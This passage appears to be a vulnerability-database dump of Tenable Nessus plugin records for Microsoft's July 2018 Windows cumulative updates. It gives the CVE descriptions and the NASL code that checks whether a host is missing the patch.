vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8290)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338829/windows-10-update-kb4338829\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0a3fc8a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4338829.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338829');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338829])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:43:08", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338823\nor cumulative update 4338818. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2020-01-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338818.NASL", "href": "https://www.tenable.com/plugins/nessus/110982", "published": "2018-07-10T00:00:00", "title": "KB4338823: Windows 7 and Windows Server 2008 R2 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110982);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8242\",\n \"CVE-2018-8260\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8314\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104629,\n 104631,\n 104634,\n 104636,\n 104637,\n 104638,\n 104648,\n 104652,\n 104664,\n 104665,\n 104666,\n 104667,\n 104668,\n 104669\n );\n script_xref(name:\"MSKB\", value:\"4338823\");\n script_xref(name:\"MSKB\", value:\"4338818\");\n script_xref(name:\"MSFT\", value:\"MS18-4338823\");\n script_xref(name:\"MSFT\", value:\"MS18-4338818\");\n\n script_name(english:\"KB4338823: Windows 7 and Windows Server 2008 R2 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338823\nor cumulative update 4338818. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338823/windows-7-update-kb4338823\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?21aadb60\");\n # https://support.microsoft.com/en-us/help/4338818/windows-7-update-kb4338818\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d021f588\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4338823 or Cumulative Update KB4338818.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338823', '4338818');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338823, 4338818])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:43:08", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338824\nor cumulative update 4338815. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2020-01-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338815.NASL", "href": "https://www.tenable.com/plugins/nessus/110981", "published": "2018-07-10T00:00:00", "title": "KB4338824: Windows 8.1 and Windows Server 2012 R2 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110981);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8242\",\n \"CVE-2018-8260\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8313\",\n \"CVE-2018-8314\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104629,\n 104631,\n 104634,\n 104636,\n 104637,\n 104638,\n 104648,\n 104652,\n 104664,\n 104665,\n 104666,\n 104667,\n 104668,\n 104669,\n 104670\n );\n script_xref(name:\"MSKB\", value:\"4338815\");\n script_xref(name:\"MSKB\", value:\"4338824\");\n script_xref(name:\"MSFT\", value:\"MS18-4338815\");\n script_xref(name:\"MSFT\", value:\"MS18-4338824\");\n\n script_name(english:\"KB4338824: Windows 8.1 and Windows Server 2012 R2 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338824\nor cumulative update 4338815. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n 